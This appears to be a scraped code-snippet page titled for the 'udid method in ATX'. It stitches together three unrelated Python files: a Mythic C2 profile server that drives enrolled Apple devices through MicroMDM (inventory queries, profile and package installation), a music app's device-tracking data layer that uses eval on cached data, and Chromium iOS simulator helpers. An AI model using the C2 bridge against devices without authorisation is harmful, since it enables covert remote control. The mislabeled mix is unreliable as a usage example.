How to use udid method in ATX

Best Python code snippet using ATX

server

Source:server Github

copy

Full Screen

1#!/usr/bin/env python32from sanic import Sanic3from sanic.response import html, redirect, text, raw4from sanic.exceptions import NotFound5import sys6import asyncio7import ssl8from pathlib import Path9# rookuu's imports10from base64 import b64decode, b64encode11from time import sleep12import requests13import json14import os15import subprocess16import plistlib17import random18import string19import threading20config = {}21agents = {}22mdm_host = None23lock = None24async def print_flush(message):25 print(message)26 sys.stdout.flush()27def server_error_handler(request, exception):28 if request is None:29 print("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP")30 sys.stdout.flush()31 return html("Error: Failed to process request", status=500, headers={})32 return html("Error: Requested URL {} not found".format(request.url), status=404, headers=config[request.app.name]['headers'])33async def agent_message(request, **kwargs):34 global config35 global agents36 global mdm_host37 global lock38 try:39 if config[request.app.name]['debug']:40 await print_flush("agent_message request from: {} with {} and {}".format(request.url, request.cookies, request.headers))41 await print_flush(request.json)42 if request.method == "POST":43 if request.json['topic'] == 'mdm.Authenticate':44 # First time we've seen an agent.45 payload = plistlib.loads(b64decode(request.json['checkin_event']['raw_payload']))46 await print_flush(payload)47 # Issue: We need to keep track of our payloads. A specific callback, needs to be tied to a specific payload. This is not natively possible with mdm, as we don't control the data being sent. 48 # Fix: Embed some data in an installed profile then immediately query to see if that profile exists!49 udid = payload['UDID']50 if udid not in agents:51 agents[udid] = {}52 agents[udid]['os'] = payload['OSVersion'] 53 agents[udid]['host'] = payload['DeviceName']54 agents[udid]['tasks'] = {} 55 with lock:56 with open("agents.json", "w") as f:57 json.dump(agents, f) 58 # Query profile59 await asyncio.sleep(1)60 61 command = {62 "udid": udid,63 "request_type": "ProfileList"64 }65 r = requests.post("https://localhost/v1/commands", auth=('micromdm', 'mythic'), json=command, verify=False)66 elif request.json['topic'] == 'mdm.TokenUpdate':67 payload = plistlib.loads(b64decode(request.json['checkin_event']['raw_payload']))68 elif request.json['topic'] == 'mdm.Connect':69 # Agent is returning data for some command.70 payload = plistlib.loads(b64decode(request.json['acknowledge_event']['raw_payload']))71 await print_flush(payload)72 if payload['Status'] == 'Acknowledged':73 if "ProfileList" in payload:74 for profile in payload['ProfileList']:75 for payload_content in profile['PayloadContent']:76 if payload_content['PayloadType'] == "com.apple.mdm":77 payload_uuid = payload_content['PayloadDisplayName']78 await print_flush("Found payload ID: {}".format(payload_uuid))79 break80 udid = payload['UDID']81 if "callback_uuid" not in agents[udid]:82 # Check if we've already seen that payload ID, if not then we need to do a first checkin.83 agents[udid]['payload_uuid'] = payload_uuid84 checkin_payload = {85 "action": "checkin", 86 "ip": "127.0.0.1", 87 "os": agents[udid]['os'], 88 "user": "mdmclient", 89 "host": agents[udid]['host'], 90 "pid": 0, 91 "uuid": payload_uuid,92 }93 94 checkin = b64encode((payload_uuid + json.dumps(checkin_payload)).encode())95 mythic_response = requests.post(config['mythic_address'], data=checkin, headers={"Mythic": "mdm"}, verify=False)96 decoded_mythic_response = json.loads(b64decode(mythic_response.text)[36:])97 agents[udid]['callback_uuid'] = decoded_mythic_response['id']98 with lock:99 with open("agents.json", "w") as f:100 json.dump(agents, f) 101 await print_flush("Connect back from payload, assigned {}".format(decoded_mythic_response['id']))102 else:103 # Handle an actual tasking of ProfileList104 task_uuid = agents[udid]['tasks'][payload['CommandUUID']]105 callback_uuid = agents[udid]['callback_uuid']106 post_response_payload = {107 "action": "post_response",108 "responses": [109 {110 "task_id": task_uuid,111 "user_output": json.dumps(payload, default=str, indent=4, sort_keys=True),112 "completed": True113 }114 ]115 }116 checkin = b64encode((agents[udid]['callback_uuid'] + json.dumps(post_response_payload)).encode())117 mythic_response = requests.post(config['mythic_address'], data=checkin, headers={"Mythic": "mdm"}, verify=False)118 decoded_mythic_response = json.loads(b64decode(mythic_response.text)[36:])119 await print_flush(decoded_mythic_response)120 del agents[udid]['tasks'][payload['CommandUUID']]121 else:122 # Every other command comes through here.123 # We need to take the response, map back to the mythic task uuids, and build a post_response request back to mythic.124 await print_flush(payload)125 udid = payload['UDID']126 if payload['CommandUUID'] not in agents[udid]['tasks']:127 await print_flush("ERROR: This command wasn't linked to a task launched from Mythic. Not reporting output.")128 return raw('', status=200)129 task_uuid = agents[udid]['tasks'][payload['CommandUUID']]130 callback_uuid = agents[udid]['callback_uuid']131 post_response_payload = {132 "action": "post_response",133 "responses": [134 {135 "task_id": task_uuid,136 "user_output": json.dumps(payload, default=str, indent=4, sort_keys=True),137 "completed": True138 }139 ]140 }141 checkin = b64encode((agents[udid]['callback_uuid'] + json.dumps(post_response_payload)).encode())142 mythic_response = requests.post(config['mythic_address'], data=checkin, headers={"Mythic": "mdm"}, verify=False)143 decoded_mythic_response = json.loads(b64decode(mythic_response.text)[36:])144 await print_flush(decoded_mythic_response)145 del agents[udid]['tasks'][payload['CommandUUID']]146 with lock:147 with open("agents.json", "w") as f:148 json.dump(agents, f) 149 elif payload['Status'] == "Idle":150 payload = plistlib.loads(b64decode(request.json['acknowledge_event']['raw_payload']))151 udid = payload['UDID']152 get_tasking_payload = {153 "action": "get_tasking", 154 "tasking_size": -1155 }156 checkin = b64encode((agents[udid]['callback_uuid'] + json.dumps(get_tasking_payload)).encode())157 mythic_response = requests.post(config['mythic_address'], data=checkin, headers={"Mythic": "mdm"}, verify=False)158 decoded_mythic_response = json.loads(b64decode(mythic_response.text)[36:])159 await print_flush(decoded_mythic_response)160 161 for task in decoded_mythic_response['tasks']:162 if task['command'] == "device_information":163 task_json = {164 "udid": udid,165 "request_type": "DeviceInformation",166 "queries": []167 }168 elif task['command'] == 'certificate_list':169 task_json = {170 "udid": udid,171 "request_type": "CertificateList"172 }173 174 elif task['command'] == 'installed_application_list':175 task_json = {176 "udid": udid,177 "request_type": "InstalledApplicationList"178 }179 180 elif task['command'] == 'profile_list':181 task_json = {182 "udid": udid,183 "request_type": "ProfileList"184 }185 186 elif task['command'] == 'provisioning_profile_list':187 task_json = {188 "udid": udid,189 "request_type": "ProvisioningProfileList"190 }191 192 elif task['command'] == 'security_info':193 task_json = {194 "udid": udid,195 "request_type": "SecurityInfo"196 }197 198 elif task['command'] == 'install_profile':199 print(task)200 task_json = {201 "udid": udid,202 "request_type": "InstallProfile",203 "payload": json.loads(task['parameters'])['file']204 }205 elif task['command'] == 'install_pkg':206 # First, take the signed pkg file and move it to /pkg207 signed_pkg = json.loads(task['parameters'])['file']208 signed_pkg_name = ''.join(random.choice(string.ascii_letters) for i in range(8)) 209 with open("/pkg/{}.pkg".format(signed_pkg_name), "wb") as f:210 f.write(b64decode(signed_pkg))211 # Then, use mdmctl apply to generate a manifest file, or do it yourself.212 p = subprocess.Popen([213 "/build/linux/mdmctl",214 "apply", "app",215 "-pkg", "/pkg/{}.pkg".format(signed_pkg_name),216 "-pkg-url", "https://{}/repo/{}.pkg".format(mdm_host, signed_pkg_name),217 "-upload"218 ])219 p.communicate()220 with open("/pkg/{}.plist".format(signed_pkg_name), "r") as f:221 plist = f.read()222 plist.replace("localhost", mdm_host)223 with open("/pkg/{}.plist".format(signed_pkg_name), "w") as f:224 f.write(plist)225 task_json = {226 "udid": udid,227 "request_type": "InstallApplication",228 "manifest_url": "https://{}/repo/{}.plist".format(mdm_host, signed_pkg_name)229 }230 r = requests.post("https://localhost/v1/commands", auth=('micromdm', 'mythic'), json=task_json, verify=False)231 # Create a mapping between MicroMDM command UUIDs and Mythic task UUIDs.232 command_uuid = r.json()['payload']['command_uuid']233 234 agents[udid]['tasks'][command_uuid] = task['id']235 with lock:236 with open("agents.json", "w") as f:237 json.dump(agents, f) 238 239 elif request.json['topic'] == "mythic.force_callback":240 callback_uuid = request.json['callback_uuid']241 udid = None242 await print_flush(request.json)243 for agent_udid, agent in agents.items():244 if agent['callback_uuid'] == callback_uuid:245 udid = agent_udid246 break247 if not udid:248 raise Exception("Agent not found")249 await print_flush("Forced callback for {} ({})".format(callback_uuid, udid))250 r = requests.get("https://localhost/push/{}".format(udid), auth=('micromdm', 'mythic'), verify=False) 251 return raw('', status=200)252 except Exception as e:253 if config[request.app.name]['debug']:254 await print_flush("error in agent_message: {}".format(str(e)))255 return await no_match(request, NotFound)256if __name__ == "__main__":257 sys.path.append("/Mythic/mythic")258 from mythic_c2_container.C2ProfileBase import *259 from mythic_c2_container.MythicCallbackRPC import *260 config_file = open("config.json", 'rb')261 main_config = json.loads(config_file.read().decode('utf-8'))262 print("Opening config and starting mdm...")263 sys.stdout.flush()264 # basic mapping of the general endpoints to the real endpoints265 try:266 config['mythic_address'] = os.environ['MYTHIC_ADDRESS']267 except Exception as e:268 print("failed to find MYTHIC_ADDRESS environment variable")269 sys.stdout.flush()270 sys.exit(1)271 config[str(main_config['webhook_port'])] = {'debug': main_config['debug']}272 if main_config['debug']:273 print("Debugging statements are enabled. This gives more context, but might be a performance hit")274 else:275 print("Debugging statements are disabled")276 sys.stdout.flush()277 with open("/certs/mdm.crt", "wb") as f:278 f.write(b64decode(main_config['tls_cert']))279 with open("/certs/mdm.key", "wb") as f:280 f.write(b64decode(main_config['tls_key']))281 mdm_host = main_config['mdm_host']282 # load agents]283 lock = threading.Lock()284 if os.path.exists("agents.json"):285 with open("agents.json", "r") as f:286 agents = json.load(f)287 os.system("cp /var/db/micromdm/micromdm.db /Mythic/micromdm.db")288 os.system("ln -sf /Mythic/micromdm.db /var/db/micromdm/micromdm.db")289 # start mdm290 p = subprocess.Popen([291 "/build/linux/micromdm", "serve",292 "-server-url=https://{}".format(main_config['mdm_host']),293 "-api-key", "mythic",294 "-tls-cert", "/certs/mdm.crt",295 "-tls-key", "/certs/mdm.key",296 "-filerepo", "/pkg",297 "-command-webhook-url", "http://localhost:{}/webhook".format(main_config['webhook_port'])298 ])299 # now to create an app to handle webhook300 app = Sanic(str(main_config['webhook_port']))301 app.config['REQUEST_MAX_SIZE'] = 1000000000302 app.config['REQUEST_TIMEOUT'] = 600303 app.config['RESPONSE_TIMEOUT'] = 600304 app.add_route(agent_message, "/webhook", methods=['GET', 'POST'])305 app.error_handler.add(Exception, server_error_handler)306 if main_config['debug']:307 server = app.create_server(host="127.0.0.1", port=main_config['webhook_port'], debug=True, return_asyncio_server=True, access_log=True)308 else:309 server = app.create_server(host="127.0.0.1", port=main_config['webhook_port'], debug=False, return_asyncio_server=True, access_log=False)310 task = asyncio.ensure_future(server)311 try:312 loop = asyncio.get_event_loop()313 def callback(fut):314 try:315 fetch_count = fut.result()316 except:317 print("port already in use")318 sys.stdout.flush()319 sys.exit()320 task.add_done_callback(callback)321 loop.run_forever()322 except:323 sys.stdout.flush()324 sys.exit()...

Full Screen

Full Screen

user_dal.py

Source:user_dal.py Github

copy

Full Screen

1import redis2import time3import json4from datetime import datetime5from api.user.constants import INVALID_IDFAS6from api.constants import EnumUserGroup7from api.log import exception_logger, api_logger89from api.user.models import UserSelectInfo, UniqueDeviceInfo10from pyutil.api.redis_key import get_songlist_receive_version_for_udid_key, \11 get_songlist_receive_version_key, get_uid_info_key12from pyutil.api.account import Platform13from api.user.types import MAX_DEVICES_ONLINE, LoginStatus, User14from api.channel.constants import VALID_GENDERS, VALID_AGES1516class UniqueDeviceInfoDAL(object):17 def __init__(self, redis_pool):18 self.udid_status_redis = redis.StrictRedis(connection_pool=redis_pool)1920 @staticmethod21 def get_udid_by_idfa(idfa):22 if not idfa or idfa in INVALID_IDFAS or len(set(idfa)) < 5:23 api_logger.error('invalid idfa:{}'.format(idfa))24 return None25 records = list(UniqueDeviceInfo.objects(idfa=idfa))26 if records and len(records[0].unique_device_id) > 10:27 api_logger.info('get_udid_by_idfa succeed|idfa:{}|udid:{}'.format(idfa, records[0].unique_device_id))28 return records[0].unique_device_id29 return None3031 @staticmethod32 def set_udid_by_idfa(idfa, udid, e_flag=''):33 # 统计要求,无效idfa统一置为空存储34 if not idfa or idfa in INVALID_IDFAS or len(set(idfa)) < 5:35 api_logger.error('invalid idfa:{}|udid:{}'.format(idfa, udid))36 idfa = ''37 device_info = UniqueDeviceInfo.objects(unique_device_id=udid, idfa=idfa).first()38 if device_info is None:39 device_info = UniqueDeviceInfo(idfa=idfa, unique_device_id=udid)40 if e_flag:41 device_info.e_flag = e_flag42 device_info.save()43 api_logger.info('idfa:{}|udid:{}'.format(idfa, udid))4445 @staticmethod46 def set_udid_by_atd(atd, udid, e_flag=''):47 # 统计要求,无效atd统一置为空存储48 if not atd or len(set(atd)) < 5:49 api_logger.error('invalid atd:{}|udid:{}'.format(atd, udid))50 atd = ''51 device_info = UniqueDeviceInfo.objects(unique_device_id=udid, atd=atd).first()52 if device_info is None:53 device_info = UniqueDeviceInfo(unique_device_id=udid, atd=atd)54 if e_flag and UniqueDeviceInfo.objects(unique_device_id=udid, e_flag__exists=1).first() is None:55 device_info.e_flag = e_flag56 device_info.save()57 api_logger.info('atd:{}|udid:{}'.format(atd, udid))5859 @staticmethod60 def set_udid_by_afid(af_id, udid):61 if not af_id:62 api_logger.error('invalid af_id:{}'.format(af_id))63 return64 device_info = UniqueDeviceInfo.objects(unique_device_id=udid).first()65 if device_info:66 device_info.af_id = af_id67 else:68 device_info = UniqueDeviceInfo()69 device_info.unique_device_id = udid70 device_info.af_id = af_id71 device_info.save()72 api_logger.info('af_id:{}|udid:{}'.format(af_id, udid))7374 def get_udid_status(self, udid, atd):75 udid_status = EnumUserGroup.ALL76 try:77 udid_ctime = int(self.udid_status_redis.get(udid) or time.time())78 tstruct0 = datetime.now().timetuple()79 tstruct1 = time.localtime(udid_ctime)80 if tstruct0.tm_year == tstruct1.tm_year and tstruct0.tm_yday == tstruct1.tm_yday:81 udid_status = EnumUserGroup.NEW82 # 新用户考虑存入atd83 if atd:84 UniqueDeviceInfoDAL.set_udid_by_atd(atd, udid)85 except Exception as e:86 exception_logger.exception('udid:{} except:{}'.format(udid, e))8788 return udid_status8990 def set_udid_ts(self, udid):91 try:92 self.udid_status_redis.setnx(udid, int(time.time()))93 except Exception as e:94 exception_logger.exception('udid:{}, e:{}'.format(udid, e))9596 def get_udid_ts(self, udid):97 return bool(self.udid_status_redis.get(udid))9899100class UserDAL():101102 def clear_device(self, uid, udid, uid_info_redis_cli):103 key = get_uid_info_key(uid)104 raw_online_devices = uid_info_redis_cli.hget(key, 'online_devices')105 online_devices = json.loads(raw_online_devices) \106 if raw_online_devices else []107 online_devices = [_udid for _udid in online_devices if _udid != udid]108 if online_devices:109 uid_info_redis_cli.hset(110 key, 'online_devices', json.dumps(online_devices))111 else:112 uid_info_redis_cli.delete(key)113114 def get_login_status(115 self, token_expire_at, uid, udid, platform, redis_cli116 ):117 if token_expire_at < int(time.time()):118 if platform == Platform.FACEBOOK:119 login_status = LoginStatus.FACEBOOK_TOKEN_EXPIRE120 elif platform == Platform.TWITTER:121 login_status = LoginStatus.TWITTER_TOKEN_EXPIRE122 else:123 login_status = LoginStatus.UNKNOWN_EXPIRE124 else:125 key = get_uid_info_key(uid)126 raw_online_devices = redis_cli.hget(key, 'online_devices')127 online_devices = json.loads(raw_online_devices) \128 if raw_online_devices else []129 if udid in online_devices:130 login_status = LoginStatus.OK131 else:132 login_status = LoginStatus.FORCE_LOGOUT133 return login_status134135 def save_uid_online_devices(self, uid, udid, redis_cli):136 key = get_uid_info_key(uid)137 raw_online_devices = redis_cli.hget(key, 'online_devices')138 online_devices = json.loads(raw_online_devices) \139 if raw_online_devices else []140 if udid not in online_devices:141 online_devices.append(udid)142 online_devices = online_devices[-MAX_DEVICES_ONLINE:]143 redis_cli.hset(key, 'online_devices', json.dumps(online_devices))144145 def get_songlist_cvs(self, uid, udid, redis_cli):146 if uid:147 id, id_type = uid, User.TYPE_UID148 else:149 id, id_type = udid, User.TYPE_UNIQUE_DEVICE_ID150 cvs_key = get_songlist_receive_version_key(id, id_type)151 version_info = redis_cli.get(cvs_key)152 version_key = get_songlist_receive_version_for_udid_key(udid)153 version_info = {} if not version_info else eval(version_info)154 csv = int(version_info.get(version_key, -1))155 return csv156157158class UserSelectInfoDAL(object):159 def __init__(self):160 pass161162 @staticmethod163 def get(udid, uid):164 pk, utype = (uid, 1) if uid else (udid, 0)165 try:166 user_select_info = UserSelectInfo.objects.get(user_id=pk, user_type=utype)167 user_select_info_dict = dict(gender=user_select_info.gender, age_stage=user_select_info.age_stage)168 return user_select_info_dict169 except Exception as e:170 pass171 return {}172173 @staticmethod174 def set(udid, gender, age_stage, uid):175 pk, utype = (uid, 1) if uid else (udid, 0)176 # 性别、年龄需至少存在一个有效信息177 if gender not in VALID_GENDERS and age_stage not in VALID_AGES:178 raise Exception('udid={}|invalid gender={}|age={}'.format(udid, gender, age_stage))179180 if gender == -1:181 rv = UserSelectInfo.objects(user_id=pk, user_type=utype).modify(age_stage=age_stage, mtime=datetime.now(), upsert=True, new=True)182 elif age_stage == -1:183 rv = UserSelectInfo.objects(user_id=pk, user_type=utype).modify(gender=gender, mtime=datetime.now(), upsert=True, new=True)184 else:185 rv = UserSelectInfo.objects(user_id=pk, user_type=utype).modify(gender=gender, age_stage=age_stage, mtime=datetime.now(), upsert=True, new=True)186 return {'gender': rv.gender, 'age_stage': rv.age_stage}187188189class UniqueDeviceInfoDAL(object):190 def __init__(self, redis_pool):191 self.udid_status_redis = redis.StrictRedis(connection_pool=redis_pool)192193 @staticmethod194 def get_udid_by_idfa(idfa):195 if not idfa or idfa in INVALID_IDFAS or len(set(idfa)) < 5:196 api_logger.error('invalid idfa:{}'.format(idfa))197 return None198 records = list(UniqueDeviceInfo.objects(idfa=idfa))199 if records and len(records[0].unique_device_id) > 10:200 api_logger.info('get_udid_by_idfa succeed|idfa:{}|udid:{}'.format(idfa, records[0].unique_device_id))201 return records[0].unique_device_id202 return None203204 @staticmethod205 def set_udid_by_idfa(idfa, udid, e_flag=''):206 # 统计要求,无效idfa统一置为空存储207 if not idfa or idfa in INVALID_IDFAS or len(set(idfa)) < 5:208 api_logger.error('invalid idfa:{}|udid:{}'.format(idfa, udid))209 idfa = ''210 device_info = UniqueDeviceInfo.objects(unique_device_id=udid, idfa=idfa).first()211 if device_info is None:212 device_info = UniqueDeviceInfo(idfa=idfa, unique_device_id=udid)213 if e_flag:214 device_info.e_flag = e_flag215 device_info.save()216 api_logger.info('idfa:{}|udid:{}'.format(idfa, udid))217218 @staticmethod219 def set_udid_by_atd(atd, udid, e_flag=''):220 # 统计要求,无效atd统一置为空存储221 if not atd or len(set(atd)) < 5:222 api_logger.error('invalid atd:{}|udid:{}'.format(atd, udid))223 atd = ''224 device_info = UniqueDeviceInfo.objects(unique_device_id=udid, atd=atd).first()225 if device_info is None:226 device_info = UniqueDeviceInfo(unique_device_id=udid, atd=atd)227 if e_flag and UniqueDeviceInfo.objects(unique_device_id=udid, e_flag__exists=1).first() is None:228 device_info.e_flag = e_flag229 device_info.save()230 api_logger.info('atd:{}|udid:{}'.format(atd, udid))231232 @staticmethod233 def set_udid_by_afid(af_id, udid):234 if not af_id:235 api_logger.error('invalid af_id:{}'.format(af_id))236 return237 device_info = UniqueDeviceInfo.objects(unique_device_id=udid).first()238 if device_info:239 device_info.af_id = af_id240 else:241 device_info = UniqueDeviceInfo()242 device_info.unique_device_id = udid243 device_info.af_id = af_id244 device_info.save()245 api_logger.info('af_id:{}|udid:{}'.format(af_id, udid))246247 def get_udid_status(self, udid, atd):248 udid_status = EnumUserGroup.ALL249 try:250 udid_ctime = int(self.udid_status_redis.get(udid) or time.time())251 tstruct0 = datetime.now().timetuple()252 tstruct1 = time.localtime(udid_ctime)253 if tstruct0.tm_year == tstruct1.tm_year and tstruct0.tm_yday == tstruct1.tm_yday:254 udid_status = EnumUserGroup.NEW255 # 新用户考虑存入atd256 if atd:257 UniqueDeviceInfoDAL.set_udid_by_atd(atd, udid)258 except Exception as e:259 exception_logger.exception('udid:{} except:{}'.format(udid, e))260 return udid_status261262 def set_udid_ts(self, udid):263 try:264 self.udid_status_redis.setnx(udid, int(time.time()))265 except Exception as e:266 exception_logger.exception('udid:{}, e:{}'.format(udid, e))267268 def get_udid_ts(self, udid):269 return bool(self.udid_status_redis.get(udid))270 ...

Full Screen

Full Screen

iossim_util.py

Source:iossim_util.py Github

copy

Full Screen

...56 if runtime['version'] == version and 'iOS' in runtime['name']:57 return runtime['identifier']58 raise test_runner.SimulatorNotFoundError('Not found "%s" SDK in runtimes %s' %59 (version, simulators['runtimes']))60def get_simulator_runtime_by_device_udid(simulator_udid):61 """Gets simulator runtime based on simulator UDID.62 Args:63 simulator_udid: (str) UDID of a simulator.64 """65 simulator_list = get_simulator_list()['devices']66 for runtime, simulators in simulator_list.items():67 for device in simulators:68 if simulator_udid == device['udid']:69 return runtime70 raise test_runner.SimulatorNotFoundError(71 'Not found simulator with "%s" UDID in devices %s' % (simulator_udid,72 simulator_list))73def get_simulator_udids_by_platform_and_version(platform, version):74 """Gets list of simulators UDID based on platform name and iOS version.75 Args:76 platform: (str) A platform name, e.g. "iPhone 11"77 version: (str) A version name, e.g. "13.2.2"78 """79 simulators = get_simulator_list()80 devices = simulators['devices']81 sdk_id = get_simulator_runtime_by_version(simulators, version)82 results = []83 for device in devices.get(sdk_id, []):84 if device['name'] == _compose_simulator_name(platform, version):85 results.append(device['udid'])86 return results87def create_device_by_platform_and_version(platform, version):88 """Creates a simulator and returns UDID of it.89 Args:90 platform: (str) A platform name, e.g. "iPhone 11"91 version: (str) A version name, e.g. "13.2.2"92 """93 name = _compose_simulator_name(platform, version)94 LOGGER.info('Creating simulator %s', name)95 simulators = get_simulator_list()96 device_type = get_simulator_device_type_by_platform(simulators, platform)97 runtime = get_simulator_runtime_by_version(simulators, version)98 try:99 udid = subprocess.check_output(100 ['xcrun', 'simctl', 'create', name, device_type, runtime]).rstrip()101 LOGGER.info('Created simulator in first attempt with UDID: %s', udid)102 # Sometimes above command fails to create a simulator. Verify it and retry103 # once if first attempt failed.104 if not is_device_with_udid_simulator(udid):105 # Try to delete once to avoid duplicate in case of race condition.106 delete_simulator_by_udid(udid)107 udid = subprocess.check_output(108 ['xcrun', 'simctl', 'create', name, device_type, runtime]).rstrip()109 LOGGER.info('Created simulator in second attempt with UDID: %s', udid)110 return udid111 except subprocess.CalledProcessError as e:112 LOGGER.error('Error when creating simulator "%s": %s' % (name, e.output))113 raise e114def delete_simulator_by_udid(udid):115 """Deletes simulator by its udid.116 Args:117 udid: (str) UDID of simulator.118 """119 LOGGER.info('Deleting simulator %s', udid)120 try:121 subprocess.check_output(['xcrun', 'simctl', 'delete', udid],122 stderr=subprocess.STDOUT)123 except subprocess.CalledProcessError as e:124 # Logging error instead of throwing so we don't cause failures in case125 # this was indeed failing to clean up.126 message = 'Failed to delete simulator %s with error %s' % (udid, e.output)127 LOGGER.error(message)128def wipe_simulator_by_udid(udid):129 """Wipes simulators by its udid.130 Args:131 udid: (str) UDID of simulator.132 """133 for _, devices in get_simulator_list()['devices'].items():134 for device in devices:135 if device['udid'] != udid:136 continue137 try:138 LOGGER.info('Shutdown simulator %s ', device)139 if device['state'] != 'Shutdown':140 subprocess.check_call(['xcrun', 'simctl', 'shutdown', device['udid']])141 except subprocess.CalledProcessError as ex:142 LOGGER.error('Shutdown failed %s ', ex)...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.

LambdaTest Learning Hubs:

YouTube

You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.

Run ATX automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 minutes of automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

NotHelpful